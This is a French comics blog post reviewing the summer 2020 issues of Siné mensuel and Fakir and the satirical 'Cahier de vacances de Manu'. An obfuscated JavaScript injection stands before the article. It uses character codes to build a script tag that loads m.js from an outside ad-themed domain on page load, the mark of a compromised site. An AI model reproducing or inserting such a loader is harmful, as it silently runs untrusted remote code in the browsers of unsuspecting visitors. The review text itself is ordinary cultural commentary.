Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Passage en revues – et journaux (4) : les vacances apprenantes avec Fakir, Siné mensuel et le Cahier de Manu

    Pour clore ce petit passage en revues de l’offre éditoriale dessinée de cet été 2020, quelques journaux qui, bien que n’étant pas techniquement des revues, participent à cette visibilité graphique estivale.

    Comme chaque année, Siné mensuel propose un copieux numéro double pour l’été. De quoi se ressourcer comme nous y invite le dessin mise en abîme de Pinel.

    Au-delà d’un dossier Black Live Matters, des quizz et des nouvelles (signées Jean-Bernard Pouy, Patrick Raynal, Serge Quadrupani et Joffrine Donnadieu) – tous joliment illustrés – et pour s’en tenir aux dessins, on notera le bilan du “jour d’après” par Lacombe, la proximité joueuse de Macron et Sarkozy dévoilée par Lindingre, la technique de l’étranglement social illustrée par Faujour et les vacances à la plage vues par Berth et Jiho. Et si Carali ne propose pas son habituelle page de souvenirs, il lui substitue une très chouette page de jeux dessinés.

    Et l’actu du début de l’été, n’est pas oublié sous le trait grinçant et sarcastique de Jiho (avec Marianne “étouffant” sous le sondage annonçant déjà une présidentielle Macron – Le Pen en 2022), Lacombe (plongeant dans les “vacances apprenantes” pour futur chômeur ou Lasserpe expliquant – limpidement  – le principe des “accords de performance” (soit vous acceptez les baisses de salaires, soit vous êtes virés…).  De quoi être d’attaque pour la rentrée donc.

    Fakir, le journal de François Ruffin a pris aussi une petite couleur estivale, avec un “cahier central de jeux de l’été”, dont on recommande notamment le “test de (mauvaise) conduite”  ou celui “d’illusion d’optique politique”.

    Pour le reste, on appréciera les dessins drôles et justes de Pierrick pour illustrer le dossier sur la 5G et celui, cinglant de Rodho sur la découverte par LREM du monde des assistantes maternelles (après la polémique sur twitter initié par quelques députés de la majorité ayant cru piéger le député de la Somme François Ruffin sur le salaire de “4 euros de l’euro” d’une assistante maternelle et s’étant eux-mêmes ridiculisés par leur méconnaissance de la réalité sociale de la France de 2020.

    Enfin, puisqu’il reste encore quelques jours de vacances, on peut rigoler et s’instruire avec le nouveau“Cahier de vacances de Manu”, cahier devenu avec plus de déférence celui de “Monsieur le Président de la République”, mais toujours concocté par les humoristes de France Inter Guillaume Meurice et Charline Vanhoenacker et dessiné par Cami. Un ouvrage à la fois drôle et rigoureux en passe de redonner leurs lettres de vacances et un côté “hype” aux bons vieux cahiers de vacances qui firent soupirer des générations entières d’enfants.

    Pour ce qui est des “vacances apprenantes”, c’est en tout cas impeccable avec une centaine de pages d’exercices de français (trouver des synonymes de “formidable” pour la Une de Paris-Match sur Macron ou une formule pour excuser les dividendes versés aux actionnaires), d’histoire-géo (remettre les bonnes dates dans le cours d’histoire de Marion Maréchal-Le Pen), de maths (calculer le bilan carbone d’un déplacement du ministre de l’Environnement), de langues étrangères (exercice de traduction de l’anglais justifiant le Brexit ou traduction d’une phrase énervée d’un pingouin à Ségolène Royal) ou de physique-chimie (retrouver les espèces portées disparues, comme l’éléphant du PS et la dignité de Valls ou associer chaque substances nocives à leurs produits alimentaires de prédilection), plus quelques tests pour connaître ses capacités à devenir par exemple journaliste d’investigation.

    Et, en plus, c’est pour la bonne cause, puisque les droits d’auteurs du trio seront reversés cette fois à la Fondation Abbé Pierre (après une opération similaire au profit du Secours populaire l’an dernier).

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Un album pour bien commencer la rentrée

    Une année au lycée, tome 2: deuxième guide de survie pédagogique en milieu numérique, ...

    Fakir, ça roule…

    Le nouveau numéro de Fakir (n°70, déjà), vient de sortir. Avec une fois encore, ...

    Mars attaque !

    On Mars, tome 2: les solitaires, Sylvain Runberg (scénario), Grun (dessin). Editions Daniel Maghen, ...

    1917, les huit mois qui ébranlèrent le monde

    Octobre 17, Patrick Rotman (scénario), Benoît Blary (dessin). Editions Delcourt/Seuil, 112 pages, 17,95 euros. ...

    Le statut des auteurs (notamment de BD) s’enracine

    Le très attendu Rapport de Bruno Racine sur le statut de l’auteur (de bande ...

    Dernier week-end (de l’année) pour la BD à la Halle Freyssinet

    Dernier week-end pour les Rendez-vous de la bande dessinée d’Amiens 2019, qui depuis l’an ...